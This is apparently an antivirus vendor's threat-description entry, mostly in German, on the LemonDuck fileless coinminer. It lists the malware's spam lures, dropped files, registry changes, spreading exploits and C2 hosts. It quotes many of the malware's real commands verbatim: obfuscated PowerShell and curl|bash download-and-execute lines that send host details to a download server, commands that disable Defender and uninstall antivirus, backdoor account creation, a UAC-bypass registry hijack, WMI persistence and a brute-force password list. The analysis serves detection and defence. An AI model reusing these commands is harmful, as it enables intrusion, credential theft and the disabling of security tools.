Fileless.LEMONDUCK
Trojan-Dropper.PowerShell.Compressed.b (KASPERSKY); Trojan.PowerShell.Crypt (IKARUS)
Windows, Linux
Type de grayware:
Coinminer
Destructif:
Non
Chiffrement:
Non
In the wild::
Oui
Overview
Wird als Spam-Mail-Anhang durch andere Malware/Grayware/Spyware oder bösartige Benutzer übertragen.
Nutzt Software-Schwachstellen aus, um sich auf andere Computer in einem Netzwerk zu verbreiten.
Anschließend werden die heruntergeladenen Dateien ausgeführt. Dadurch können die bösartigen Routinen der heruntergeladenen Dateien auf dem betroffenen System aktiv werden.
Sammelt bestimmte Informationen auf dem betroffenen Computer.
Détails techniques
Übertragungsdetails
Er kommt als Anhang an folgende E-Mail-Nachrichten durch andere Malware verbreitet Grayware / Spyware oder böswillige Benutzer:
- Where Email Subject - Message Body can be any of the following combinations:
- The Truth of COVID-19 - Virus actually comes from United States of America
- COVID-19 nCov Special info WHO - very important infomation for Covid-19 see attached document for your action and discretion.
- HALTH ADVISORY:CORONA VIRUS - the outbreak of CORONA VIRUS is cause of concern especially where forign personal have recently arrived or will be arriving at various intt in near future. see attached document for your action and discretion.
- WTF - what's wrong with you?are you out of your mind!!!!!
- What the fcuk - are you out of your mind!!!!!what 's wrong with you?
- good bye - good bye, keep in touch
- farewell letter - good bye, keep in touch
- broken file - can you help me to fix the file,i can't read it
- This is your order? - file is brokened, i can't open it
Installation
Schleust die folgenden Dateien ein:
- {Removable/Network Drive name}\Dblue3.lnk
- {Removable/Network Drive name}\Eblue3.lnk
- {Removable/Network Drive name}\Fblue3.lnk
- {Removable/Network Drive name}\Gblue3.lnk
- {Removable/Network Drive name}\Hblue3.lnk
- {Removable/Network Drive name}\Iblue3.lnk
- {Removable/Network Drive name}\Jblue3.lnk
- {Removable/Network Drive name}\Kblue3.lnk
- {Removable/Network Drive name}\Dblue6.lnk
- {Removable/Network Drive name}\Eblue6.lnk
- {Removable/Network Drive name}\Fblue6.lnk
- {Removable/Network Drive name}\Gblue6.lnk
- {Removable/Network Drive name}\Hblue6.lnk
- {Removable/Network Drive name}\Iblue6.lnk
- {Removable/Network Drive name}\Jblue6.lnk
- {Removable/Network Drive name}\Kblue6.lnk
- {Removable/Network Drive name}\readme.js
- {Removable/Network Drive name}\UTFsync\inf_data - serves as infection marker
- Some LemonDuck variants deployed via the ProxyLogon vulnerability can drop the following files:
- %System%\inetpub\wwwroot\aspnet_client\js\demo\wanlin.txt
- %System%\inetpub\wwwroot\aspnet_client\js\demo\wanlins.aspx - Chopper Webshell
(Hinweis: %System% ist der Windows Systemordner. Er lautet in der Regel C:\Windows\System unter Windows 98 und ME, C:\WINNT\System32 unter Windows NT und 2000 sowie C:\Windows\System32 unter Windows 2000(32-bit), XP, Server 2003(32-bit), Vista, 7, 8, 8.1, 2008(64-bit), 2012(64bit) and 10(64-bit).)
Schleust die folgenden Dateien ein und führt sie aus:
- %User Temp%\tt.vbs - install scheduled task to execute kk4kk.log (detected as HackTool.Win32.Mpacket.SM)
- %System%\WindowsPowerShell\v1.0\{Random}.exe - legitimate copy of Powershell.exe
(Hinweis: %User Temp% ist der Ordner 'Temp' des aktuellen Benutzers, normalerweise C:\Dokumente und Einstellungen\{Benutzername}\Lokale Einstellungen\Temp unter Windows 2000(32-bit), XP und Server 2003(32-bit) und C:\Users\{Benutzername}\AppData\Local\Temp unter Windows Vista, 7, 8, 8.1, 2008(64-bit), 2012(64-bit) und 10(64-bit).. %System% ist der Windows Systemordner. Er lautet in der Regel C:\Windows\System unter Windows 98 und ME, C:\WINNT\System32 unter Windows NT und 2000 sowie C:\Windows\System32 unter Windows 2000(32-bit), XP, Server 2003(32-bit), Vista, 7, 8, 8.1, 2008(64-bit), 2012(64bit) and 10(64-bit).)
Fügt die folgenden Prozesse hinzu:
- cmd /c start /b notepad "+{Malware file name}+" & powershell -w hidden IE`x(Ne`w-Obj`ect Net.WebC`lient).DownLoadString('{Download URL}7p.php?0.7*mail_js*%username%*%computername%*'+[Environment]::OSVersion.version.Major);bpu ('{Download URL}mail.jsp?js_0.7')"
- cmd /c echo Set-MpPreference -DisableRealtimeMonitoring 1;Add-MpPreference -ExclusionPath c:\;Add-MpPreference -ExclusionProcess %System%\WindowsPowerShell\v1.0\powershell.exe|powershell -w hidden
- ComputerDefaults.exe - if ran in Windows 10
- CompMgmtLauncher.exe - if ran in other OS
- To uninstall antivirus related programs:
- cmd /c start /b wmic.exe product where "name like '%Eset%'" call uninstall /nointeractive
- cmd /c start /b wmic.exe product where "name like '%%Kaspersky%%'" call uninstall /nointeractive
- cmd /c start /b wmic.exe product where "name like '%avast%'" call uninstall /nointeractive
- cmd /c start /b wmic.exe product where "name like '%avp%'" call uninstall /nointeractive
- cmd /c start /b wmic.exe product where "name like '%Security%'" call uninstall /nointeractive
- cmd /c start /b wmic.exe product where "name like '%AntiVirus%'" call uninstall /nointeractive
- cmd /c start /b wmic.exe product where "name like '%Norton Security%'" call uninstall /nointeractive
- cmd /c "C:\Progra~1\Malwarebytes\Anti-Malware\unins000.exe" /verysilent /suppressmsgboxes /norestart
- To open ports:
- cmd.exe /c netsh.exe firewall add portopening tcp 65529 SDNSd
- netsh.exe interface portproxy add v4tov4 listenport=65529 connectaddress=1.1.1.1 connectport=53
- netsh advfirewall firewall add rule name="deny445" dir=in protocol=tcp localport=445 action=block
- netsh advfirewall firewall add rule name="deny135" dir=in protocol=tcp localport=135 action=block
- cmd.exe /c echo try{$localKr=$flase;New-Object Threading.Mutex($true,'Global\eLocalKr',[ref]$localKr)}catch{};$ifmd5='9f9075b6db0089161c96cabf65974fa3';$ifp=$env:tmp+'\kr.bin';$down_url='{Download URL}';function gmd5($con){[System.Security.Cryptography.MD5]::Create().ComputeHash($con)^^^|foreach{$s+=$_.ToString('x2')};return $s}if(test-path $ifp){$con_=[System.IO.File]::ReadAllBytes($ifp);$md5_=gmd5 $con_;if($md5_-eq$ifmd5){$noup=1}}if(!$noup){$con=(Ne`w-Obj`ect Net.WebC`lient).downloaddata($down_url+'/kr.bin?^^^&{Computer Name}^^^&{Gathered information}^^^&{MAC Address}');$t=gmd5 $con;if($t-eq$ifmd5){[System.IO.File]::WriteAllBytes($ifp,$con)}else{$noup=1}}if($noup){$con=$con_;$ifmd5=$md5_}I`EX(-join[char[]]$con)|{Random}.exe -
- cmd.exe /c echo try{$localIf=$flase;New-Object Threading.Mutex($true,'Global\eLocalIf',[ref]$localIf)}catch{};$ifmd5='144f3ede7ec9d604a58113fc91a246d1';$ifp=$env:tmp+'\if.bin';$down_url='{Download URL}';function gmd5($con){[System.Security.Cryptography.MD5]::Create().ComputeHash($con)^^^|foreach{$s+=$_.ToString('x2')};return $s}if(test-path $ifp){$con_=[System.IO.File]::ReadAllBytes($ifp);$md5_=gmd5 $con_;if($md5_-eq$ifmd5){$noup=1}}if(!$noup){$con=(Ne`w-Obj`ect Net.WebC`lient).downloaddata($down_url+'/if.bin?^^^&{Computer Name}^^^&{Gathered information}^^^&{MAC Address}');$t=gmd5 $con;if($t-eq$ifmd5){[System.IO.File]::WriteAllBytes($ifp,$con)}else{$noup=1}}if($noup){$con=$con_;$ifmd5=$md5_}I`EX(-join[char[]]$con)|{Random}.exe -
- For 64bit machines:
- cmd.exe /c echo try{$localTMn=$flase;New-Object Threading.Mutex($true,'Global\elocalTMn',[ref]$localKr)}catch{};$ifmd5='4001ba98a424fdb63047a23af97ec590';$ifp=$env:tmp+'\m6.bin';$down_url='{Download URL}';function gmd5($con){[System.Security.Cryptography.MD5]::Create().ComputeHash($con)^^^|foreach{$s+=$_.ToString('x2')};return $s}if(test-path $ifp){$con_=[System.IO.File]::ReadAllBytes($ifp);$md5_=gmd5 $con_;if($md5_-eq$ifmd5){$noup=1}}if(!$noup){$con=(Ne`w-Obj`ect Net.WebC`lient).downloaddata($down_url+'/m6.bin?^^^&{Computer Name}^^^&{Gathered information}^^^&{MAC Address}');$t=gmd5 $con;if($t-eq$ifmd5){[System.IO.File]::WriteAllBytes($ifp,$con)}else{$noup=1}}if($noup){$con=$con_;$ifmd5=$md5_}I`EX(-join[char[]]$con)|{Random}.exe -
- For 64bit machines and video card is any of the following: {GTX, NVIDIA, GEFORCE, Radeon, AMD}
- cmd.exe /c echo try{$localTMng=$flase;New-Object Threading.Mutex($true,'Global\elocalTMng',[ref]$localKr)}catch{};$ifmd5='a921b532d5d239e4a2e71e5f853195cd';$ifp=$env:tmp+'\m6g.bin';$down_url='{Download URL}';function gmd5($con){[System.Security.Cryptography.MD5]::Create().ComputeHash($con)^^^|foreach{$s+=$_.ToString('x2')};return $s}if(test-path $ifp){$con_=[System.IO.File]::ReadAllBytes($ifp);$md5_=gmd5 $con_;if($md5_-eq$ifmd5){$noup=1}}if(!$noup){$con=(Ne`w-Obj`ect Net.WebC`lient).downloaddata($down_url+'/m6g.bin?^^^&{Computer Name}^^^&{Gathered information}^^^&{MAC Address}');$t=gmd5 $con;if($t-eq$ifmd5){[System.IO.File]::WriteAllBytes($ifp,$con)}else{$noup=1}}if($noup){$con=$con_;$ifmd5=$md5_}I`EX(-join[char[]]$con)|{Random}.exe -
- Some variants of LemonDuck execute the following:
- Add users and local groups:
- net user netcat 'qweqwe$123123' /add
- net localgroup administrators netcat /add
- net localgroup Administrateurs netcat /add
- net localgroup 'Remote Desktop Users' netcat /add
- net localgroup 'Enterprise Admins' netcat /add
- net group 'Enterprise Admins' netcat /add /domain
- powershell.exe -ep bypass -c "Add-PSSnapin Microsoft.Exchange.Management.PowerShell.SnapIn;new-managementroleassignment -role applicationimpersonation -user netcat"
- powershell.exe -ep bypass -c "Add-PSSnapin Microsoft.Exchange.Management.PowerShell.E2010;new-managementroleassignment -role applicationimpersonation -user netcat"
- powershell.exe -ep bypass -c "Add-PSSnapin Microsoft.Exchange.Management.PowerShell.Admin;new-managementroleassignment -role applicationimpersonation -user netcat"
- Delete AV related firewall rules:
- cmd /c netsh advfirewall set allprofiles state off
- cmd /c netsh advfirewall firewall delete rule LiveUpdate360
- cmd /c netsh advfirewall firewall delete rule 360LeakFixer.exe
- cmd /c netsh advfirewall firewall delete rule 360bdoctor.exe
- cmd /c netsh advfirewall firewall delete rule 360netcfg.exe
- cmd /c netsh advfirewall firewall delete rule 360Seclogon
- cmd /c netsh advfirewall firewall delete rule 360rp.exe
- cmd /c netsh advfirewall firewall delete rule 360rps.exe
- cmd /c netsh advfirewall firewall delete rule 360safe.exe
- cmd /c netsh advfirewall firewall delete rule 360safe_cq.exe
- cmd /c netsh advfirewall firewall delete rule 360EvtMgr.exe
- cmd /c netsh advfirewall firewall delete rule 360se.exe
- cmd /c netsh advfirewall firewall delete rule 360sdUpd.exe
- cmd /c netsh advfirewall firewall delete rule 360sd.exe
- cmd /c netsh advfirewall firewall delete rule 360speedld.exe
- cmd /c netsh advfirewall firewall delete rule 360Tray.exe
- Delete AV related services:
- "Sophos System Protection Service"
- "Sophos AutoUpdate Service"
- "Sophos Endpoint Defense Service"
- SAVService
- SAVAdminService
- SavexSrvc
- PMContExtrSvc
- MMRot
- PMScanner
- PMEVizsla
- SavexWebAgent
- swi_filter
- swi_service
- MBAMService
- powershell.exe -psconsolefile "$env:exchangeinstallpath\bin\exshell.psc1" -command "New-ManagementRoleAssignment –Role 'Mailbox Import Export' –User netcat"
- REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
- wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1
(Hinweis: %System% ist der Windows Systemordner. Er lautet in der Regel C:\Windows\System unter Windows 98 und ME, C:\WINNT\System32 unter Windows NT und 2000 sowie C:\Windows\System32 unter Windows 2000(32-bit), XP, Server 2003(32-bit), Vista, 7, 8, 8.1, 2008(64-bit), 2012(64bit) and 10(64-bit).)
Erstellt die folgenden Ordner:
- Variants of LemonDuck deployed via ProxyLogon Vulnerability can create the following folders:
- %System%\inetpub\wwwroot\aspnet_client\js\demo
- {Exchange server installation path}\Frontend\HttpProxy\ecp\auth\js\demo
(Hinweis: %System% ist der Windows Systemordner. Er lautet in der Regel C:\Windows\System unter Windows 98 und ME, C:\WINNT\System32 unter Windows NT und 2000 sowie C:\Windows\System32 unter Windows 2000(32-bit), XP, Server 2003(32-bit), Vista, 7, 8, 8.1, 2008(64-bit), 2012(64bit) and 10(64-bit).)
Andere Systemänderungen
Ändert die folgenden Registrierungseinträge:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\
Services\LanmanServer\Parameters
DisableCompression = 1
HKEY_CURRENT_USER\Software\Classes\
ms-settings\shell\open\
command
DelegateExecute = {Null}
HKEY_CURRENT_USER\Software\Classes\
ms-settings\shell\open\
command
(default) = cmd /c echo Set-MpPreference -DisableRealtimeMonitoring 1;Add-MpPreference -ExclusionPath c:\;Add-MpPreference -ExclusionProcess %System%\WindowsPowerShell\v1.0\powershell.exe|powershell -w hidden & Iex(new-object net.webclient).downloadstring('"+{Download URL}+"?$env:username*$env:computername*$ver')
HKEY_CURRENT_USER\Software\Classes\
mscfile\shell\open\
command
DelegateExecute = {Null}
HKEY_CURRENT_USER\Software\Classes\
mscfile\shell\open\
command
(default) = cmd /c powershell -w hidden Iex(new-object net.webclient).downloadstring('"+{Download URL}+"?$env:username*$env:computername*$ver')
Verbreitung
Nutzt die folgenden Software-Schwachstellen aus, um sich auf andere Computer in einem Netzwerk zu verbreiten:
- SMB request - Eternal Blue Exploit (CVE-2017-0144)
- Upon exploitation, it may perform the following:
- Execute the following command: cmd /c schtasks /create /ru system /sc MINUTE /mo 120 /tn Rtsa /tr "powershell -c '\\"{Download URL 1}\\",\\"{Download URL 2}\\",\\"{Download URL 2}\\"|foreach{I`EX(Ne`w-Obj`ect Net.WebC`lient).\\"DownloadString\\"(\\"http://$_/ebo.jsp?0.9*$env:username*$env:computername\\")}'" /F & echo %path%|findstr /i powershell>nul || (setx path "%path%;c:\windows\system32\WindowsPowershell\v1.0" /m) & schtasks /run /tn Rtsa
- Install the following scheduled task:
Task Name: Rtsa
Task Action: \"{Download URL 1}\",\"{Download URL 2}\",\"{Download URL 2}\"|foreach{I`EX(Ne`w-Obj`ect Net.WebC`lient).\"DownloadString\"(\"http://$_/ebo.jsp?0.9*$env:username*$env:computername\")}"
- Upon exploitation, it may perform the following:
- Upon exploitation, it executes the following command:
- cmd /c powershell Set-MpPreference -DisableRealtimeMonitoring 1;Add-MpPreference -ExclusionProcess c:/windows/system32/WindowsPowerShell/v1.0/powershell.exe;Add-MpPreference -ExclusionPath c:/ & powershell IEx(New-Object Net.WebClient).DownLoadString(''{Download URL}/smgh.jsp?0.9*%computername%'')
- cmd /c powershell Set-MpPreference -DisableRealtimeMonitoring 1;Add-MpPreference -ExclusionProcess c:/windows/system32/WindowsPowerShell/v1.0/powershell.exe;Add-MpPreference -ExclusionPath c:/ & powershell IEx(New-Object Net.WebClient).DownLoadString(''{Download URL}/smgho.jsp?0.9*%computername%'')
- Upon exploitation, it may execute the following:
- %System%\cmd.exe /c echo y|{Executable Path} {Username}@{IP Address} -pw {Password} -v "src=ssh;(curl -fsSL {Download URL}/ln/core.png?0.9*ssh*`whoami`*`hostname`||wget -q -O- {Download URL}/ln/core.png?0.9*ssh*`whoami`*`hostname`)|bash"
- %System%\cmd.exe /c echo y|{Executable Path} {Username}@{IP Address} -pw {Password} -v "src=ssho;(curl -fsSL {Download URL}/ln/core.png?0.9*ssho*`whoami`*`hostname`||wget -q -O- {Download URL}/ln/core.png?0.9*ssho*`whoami`*`hostname`)|bash"
- Uses PowerDump module and Mimikatz to dump Username, password, NTLM hashes, and domain information of the target machine.
- Upon successful brute-forcing, it will add a malware detected as HackTool.Win32.EvilCLR.YXBCIA to the database server to enable the execution of the following: "powershell.exe iex(new-object net.webclient).downloadstring('{Download URL}/if.bin?once')"
- It scans for vulnerable MS-SQL port 1433. Upon exploitation, it will execute the following commands:
- cmd /c powershell IE`x(Ne`w-Obj`ect Net.WebC`lient).DownLoadString(''{Download URL}/ms.jsp?0.9*%computername%'')
- cmd /c powershell IE`x(Ne`w-Obj`ect Net.WebC`lient).DownLoadString(''{Download URL}/mso.jsp?0.9*%computername%'')
- Upon scanning for vulnerable port 6379, 16379, it may perform the following command:
- export src=rds;curl -fsSL {Download URL}/ln/core.png?rds|bash
- export src=rdso;curl -fsSL {Download URL}/ln/core.png?rdso|bash
- Upon scanning for vulnerable port 8088, it may perform the following command:
- export src=yarn;curl -fsSL {Download URL}/ln/core.png?yarn|bash
- export src=yarno;curl -fsSL {Download URL}/ln/core.png?yarno|bash
- Upon scanning for vulnerable port 7001, it may perform the following command:
- cmd /c powershell Set-MpPreference -DisableRealtimeMonitoring 1;Add-MpPreference -ExclusionProcess %System%\WindowsPowerShell\v1.0\powershell.exe;Add-MpPreference -ExclusionPath c:\ & powershell IEx(New-Object Net.WebClient).DownLoadString(''{Download URL}/logic.jsp?0.9*%computername%'')
- export src=logic;curl -fsSL {Download URL}/ln/core.png?logic|bash
- cmd /c powershell Set-MpPreference -DisableRealtimeMonitoring 1;Add-MpPreference -ExclusionProcess %System%\WindowsPowerShell\v1.0\powershell.exe;Add-MpPreference -ExclusionPath c:\ & powershell IEx(New-Object Net.WebClient).DownLoadString(''{Download URL}/logico.jsp?0.9*%computername%'')
- export src=logico;curl -fsSL {Download URL}/ln/core.png?logico|bash
- Upon exploiting vulnerable networks connecting to port 445, it does the following:
- Execute the following:
- cmd /c powershell Set-MpPreference -DisableRealtimeMonitoring 1;Add-MpPreference -ExclusionPath c:\;Add-MpPreference -ExclusionProcess %System%\WindowsPowerShell\v1.0\powershell.exe & powershell -w hidden IE`x(Ne`w-Obj`ect Net.WebC`lient).DownLoadString(''{Download URL}/7p.php?0.9*ipc*%username%*%computername%*''+[Environment]::OSVersion.version.Major);bpu (''{Download URL}/ipc.jsp?0.9'')
- cmd /c powershell Set-MpPreference -DisableRealtimeMonitoring 1;Add-MpPreference -ExclusionPath c:\;Add-MpPreference -ExclusionProcess %System%\WindowsPowerShell\v1.0\powershell.exe & powershell -w hidden IE`x(Ne`w-Obj`ect Net.WebC`lient).DownLoadString(''{Download URL}/7p.php?0.9*ipco*%username%*%computername%*''+[Environment]::OSVersion.version.Major);bpu (''{Download URL}/ipco.jsp?0.9'')
- Drop the following file:
- \{IP address}\%User Startup%\run.bat - download LemonDuck module
(Hinweis: %System% ist der Windows Systemordner. Er lautet in der Regel C:\Windows\System unter Windows 98 und ME, C:\WINNT\System32 unter Windows NT und 2000 sowie C:\Windows\System32 unter Windows 2000(32-bit), XP, Server 2003(32-bit), Vista, 7, 8, 8.1, 2008(64-bit), 2012(64bit) and 10(64-bit).. %User Startup% ist der Ordner 'Autostart' des aktuellen Benutzers, normalerweise C:\Windows\Profile\{Benutzername}\Startmenü\Programme\Autostart unter Windows 98 und ME, C:\WINNT\Profile\{Benutzername}\Startmenü\Programme\Autostart unter Windows NT, C:\Documents and Settings\{Benutzername}\Startmenü\Programme\Autostart unter Windows 2003(32-bit), XP und 2000(32-bit) und C:\Users\{Benutzername}\AppData\Roaming\Microsoft\Windows\Startmenü\Programme\Autostart unter Windows Vista, 7, 8, 8.1, 2008(64-bit), 2012(64-bit) und 10(64-bit).)
Prozessbeendigung
Beendet die folgenden Dienste, wenn sie auf dem betroffenen System gefunden werden:
- .Net CLR
- \gm
- 360rTys
- ALGM
- aspnet_staters
- AxInstSV
- ClipBooks
- CLR
- clr_optimization
- DNS Server
- ExpressVNService
- IPSECS
- lsass
- Microsoft
- Microsoft Telemetry
- MpeSvc
- mssecsvc2.0
- mssecsvc2.1
- Natimmonal
- Nationaaal
- National
- Nationalaie
- Nationalmll
- Nationaloll
- Nationalwpi
- NetMsmqActiv Media NVIDIA
- Oracleupdate
- RpcEptManger
- Samserver
- Serhiez
- Sncryption Media Playeq
- Sougoudl
- SRDSL
- SuperProServer
- SvcNlauser
- SVSHost
- SxS
- sysmgt
- system
- taskmgr1
- WebServers
- WifiService
- Windows Managers
- Windows_Update
- WinHasdadelp32
- WinHasdelp32
- WinHelp32
- WinHelp64
- WinHelpSvcs
- WinSvc
- WinVaultSvc
- WissssssnHelp32
- WmdnPnSN
- wmiApServs
- wmiApSrvs
- WWW.{BLOCKED}S.CN.COM
- Xtfy
- Xtfya
- Xtfyxxx
- xWinWpdSrv
- Zational
Beendet Prozesse oder Dienste, die einen oder mehrere dieser Zeichenfolgen enthalten, wenn sie im Speicher des betroffenen Systems ausgeführt werden:
- 360
- 8866
- 9696
- 9797
- 9966
- auto-upgeade
- Avira
- Calligrap
- cara
- Carbon
- carss
- cohernece
- conhoste
- csrsc
- DW20
- explores
- Galligrp
- gxdrv
- Imaging
- javaupd
- lsmosee
- minerd
- MinerGate
- msinfo
- ress
- SC
- SearchIndex
- secuams
- service
- Setring
- Setting
- Sqlceqp
- SQLEXPRESS_X64_86
- SQLforwin
- svchosti
- svshost
- SystemIIS
- SystemIISSec
- taskegr
- taskmgr1
- Terms.EXE
- Uninsta
- update
- upgeade
- WerFault
- WerMgr
- win
- WindowsDefender*
- WindowsUpdater*
- Workstation
- xig*
- XMR*
- xmrig*
- yamm1
- 360bdoctor.exe
- 360rp.exe
- 360rps.exe
- 360safe_cq.exe
- 360safe_se.exe
- 360sd.exe
- 360speedld.exe
- 360Tray.exe
- 360LogCenter.exe
- 360tray.exe
- 360speedld.exe
- 360se.exe
Einschleusungsroutine
Nutzt die folgenden Software-Schwachstellen, um bösartige Dateien einzuschleusen:
- Windows LNK Remote Code Execution Vulnerability (CVE-2017-8464) - Dropped in removable drives to allow execution of remote commands.
Download-Routine
Speichert die heruntergeladenen Dateien unter den folgenden Namen:
- %User Temp%\m6.bin - Modified XMRig for 64bit Machines
- %User Temp%\m6g.bin - Coinminer for 64bit Machines and video card name has the one of the following strings:"GTX","NVIDIA","GEFORCE","Radeon","AMD"
- %User Temp%\kr.bin - Kill Competitions Module
- %User Temp%\if.bin - Propagation and Exploitation Module
- %User Temp%\if_mail.bin - Email Spreader Module
- %User Temp%\ode.bin - Downloads PowerSploit module and create scheduled task
- %User Temp%\nvd.zip - Coinminer for 64bit Machines and video card name has the one of the following strings:"GTX","NVIDIA","GEFORCE","Radeon","AMD"
- %User Temp%\mimi.dat - Mimikatz module
- Modules for Process Termination, Task and WMI installation:
- %User Temp%\mso.jsp
- %User Temp%\ms.jsp
- %User Temp%\rdp.jsp
- %User Temp%\rdpo.jsp
- %User Temp%\smgh.jsp
- %User Temp%\smgho.jsp
- %User Temp%\logic.jsp
- %User Temp%\logico.jsp
(Hinweis: %User Temp% ist der Ordner 'Temp' des aktuellen Benutzers, normalerweise C:\Dokumente und Einstellungen\{Benutzername}\Lokale Einstellungen\Temp unter Windows 2000(32-bit), XP und Server 2003(32-bit) und C:\Users\{Benutzername}\AppData\Local\Temp unter Windows Vista, 7, 8, 8.1, 2008(64-bit), 2012(64-bit) und 10(64-bit).)
Anschließend werden die heruntergeladenen Dateien ausgeführt. Dadurch können die bösartigen Routinen der heruntergeladenen Dateien auf dem betroffenen System aktiv werden.
Datendiebstahl
Sammelt die folgenden Informationen auf dem betroffenen Computer:
- Machine Type (32bit or 64bit)
- Computer Name
- Product UUID
- Mac Address
- Operating system
- User name
- Machine Domain
- System uptime
- Video Controller name
- Physical memory
- Drive information:
- Drive Type
- Free space
- Drive format
- Time stamp
- JavaScript information on localhost
- Host Name
- Coinminer version - if a coinminer is present
- Ip address - if a coinminer is present
- Total hashrate - if a coinminer is present
- First 6 bytes of md5 hashes of malicious files
Andere Details
Es macht Folgendes:
- It adds the following Windows Management Instrumentation (WMI) entries under ROOT\subscription:
- Infection Marker:
- __EventFilter
- Name: blackball
- Persistence:
- __EventFilter
- Name: {Random}
- CommandLineEventConsumer
- Name: {Random}
- Command: powershell -w hidden -c function a($u){$d=(Ne`w-Obj`ect Net.WebC`lient)."DownloadData"($u);$c=$d.count;if($c -gt 173){$b=$d[173..$c];$p=New-Object Security.Cryptography.RSAParameters;$p.Modulus=[convert]::FromBase64String('{Base64 encoded command}');$p.Exponent=0x01,0x00,0x01;$r=New-Object Security.Cryptography.RSACryptoServiceProvider;$r.ImportParameters($p);if($r.verifyData($b,(New-Object Security.Cryptography.SHA1CryptoServiceProvider),[convert]::FromBase64String(-join([char[]]$d[0..171])))){I`ex(-join[char[]]$b)}}}$url='{Download URL}';a($url+'/a.jsp?mail_20210428?'+(@($env:COMPUTERNAME,$env:USERNAME,(get-wmiobject Win32_ComputerSystemProduct).UUID,(random))-join'*'))
- __FilterToConsumerBinding
- It disables Windows Defender Real Time Monitoring. It excludes Powershell.exe running in C:\ directory in Windows Defender scans.
- It will only modify "HKEY_CURRENT_USER\Software\Classes\ms-settings\shell\open\command" if the OS is Windows 10. Otherwise, the registry "HKEY_CURRENT_USER\Software\Classes\mscfile\shell\open\command" will be modified.
- It deletes the following scheduled tasks:
- /Rtsa
- /Rtsa1
- /Rtsa2
- AdobeFlashPlayer
- Bluetooths
- Credentials
- Ddrivers
- DNS
- DnsCore
- DnsCore
- DnsScan
- ECDnsCore
- Flash
- FlashPlayer1
- FlashPlayer2
- FlashPlayer3
- gm
- GooglePingConfigs
- HispDemorn
- HomeGroupProvider
- IIS
- LimeRAT-Admin
- Microsoft Telemetry
- Miscfost
- MiscfostNsi
- my1
- Mysa
- Mysa1
- Mysa2
- Mysa3
- Netframework
- ngm
- ok
- Oracle Java
- Oracle Java Update
- Oracle Products Reporter
- RavTask
- skycmd
- Sorry
- Spooler SubSystem Service
- System Log Security Check
- SYSTEM"qPt,"DNS2
- SYSTEMa
- TablteInputout
- Update
- Update qPtservice for Windows Service
- Update service for products
- Update_windows
- Update1
- Update2
- Update3
- Update4
- WebServers
- werclpsyport
- Windows_Update
- WindowsLogTasks
- WindowsUpdate1
- WindowsUpdate2
- WindowsUpdate3
- WwANsvc
- It check the presence of Outlook and Outlook\Security in the following registry keys:
- HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office
- HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Office
- HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Microsoft\Office
- HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Office
If present, it will modify the registry entry:
{Registry Key from list above}
ObjectModelGuard = 2 - It uses any of the following {Download URL} to send gathered information, as well as download related modules:
- http://t.{BLOCKED}9.com
- http://t.{BLOCKED}g.com
- http://t.{BLOCKED}9.com
- http://t.{BLOCKED}x.com
- http://t.{BLOCKED}q.com
- http://d.{BLOCKED}p.com
- http://t.{BLOCKED}1.com
- http://t.{BLOCKED}0.com
- http://down.{BLOCKED}cat.com
- http://t.{BLOCKED}kit.com
- http://t.{BLOCKED}kit.com
- http://d.{BLOCKED}g.com
- http://p.{BLOCKED}q.com
- http://lplp.{BLOCKED}g.com
- http://w.{BLOCKED}0.com
- http://info.{BLOCKED}x.com
- http://info.{BLOCKED}g.com
- http://info.{BLOCKED}0.com
- http://t.{BLOCKED}q.top
- http://p.{BLOCKED}a.com
- http://t.{BLOCKED}2.com
- http://t.{BLOCKED}q.com
- http://ps2.{BLOCKED}ihua
- http://t.{BLOCKED}n.com
- http://t.{BLOCKED}r.cc
- http://t.{BLOCKED}0.sh
- http://t.{BLOCKED}cat.co
- http://d.{BLOCKED}8.ag
- {BLOCKED}.{BLOCKED}.154.202
- {BLOCKED}.{BLOCKED}.7.85
- {BLOCKED}.{BLOCKED}.43.37
- {BLOCKED}.{BLOCKED}.225.82
- {BLOCKED}.{BLOCKED}.107.193
- {BLOCKED}.{BLOCKED}.80.221
- {BLOCKED}.{BLOCKED}.183.160
- {BLOCKED}.{BLOCKED}.188.255
- {BLOCKED}.{BLOCKED}.158.207
- It sets the machine's DNS server to Google (8.8.8.8 or 9.9.9.9)
- It uses the following credentials for brute-forcing:
- Username:
- administrator
- admin
- Passwords:
- !@#$%^&*
- 000000
- 1
- 1111
- 111111
- 111111111
- 112233
- 11223344
- 12
- 121212
- 123
- 123!@#qwe
- 123.com
- 123@abc
- 123123
- 123123123
- 123321
- 1234
- 12345
- 123456
- 1234567
- 12345678
- 123456789
- 1234567890
- 123456789a
- 123456a
- 123qwe
- 123qwe!@#
- 1q2w3e4r
- 1q2w3e4r5t
- 1qaz!QAZ
- 1qaz@WSX
- 1qaz2wsx
- 21
- 222222
- 321
- 5201314
- 555555
- 654321
- 666666
- 888888
- 88888888
- 987654321
- 999999
- a123456
- A123456
- a123456789
- Aa123456
- aa123456
- Aa123456.
- Aa12345678
- aaaaaa
- Ab123
- abc
- abc@123
- Abc123
- abc123
- ABCabc123
- abcd@1234
- abcd1234
- abcdefg
- admin
- admin@123
- Admin@123
- Admin123
- admin888
- Administrator
- administrator
- asdf
- baseball
- charlie
- compta
- demo
- dragon
- dubsmash
- football
- fuckyou
- g_czechout
- golden
- hello
- homelesspa
- Huawei@123
- iloveyou
- login
- love
- master
- monkey
- NULL
- OPERADOR
- p@ssw0rd
- P@ssw0rd
- P@SSW0RD
- P@ssw0rd123
- p@ssword
- P@ssword
- P@SSWORD
- P@w0rd
- P@word
- pass
- Passw0rd
- passw0rd
- password
- PASSWORD
- Password01
- password1
- Password1
- Password123
- princess
- qazwsx
- qwe123
- qwe1234
- qwe1234A
- qwe1234a
- qwer12345
- qwerty
- qwertyuiop
- sa
- sa123
- sa2008
- saadmin
- sapassword
- sasa
- scan
- sql2005
- sql2008
- sqlpassword
- stagiaire
- sunshine
- superman
- test
- test1
- test123
- user
- welcome
- xerox
- zinch
- zxcvbn
- NTLM Hashes:
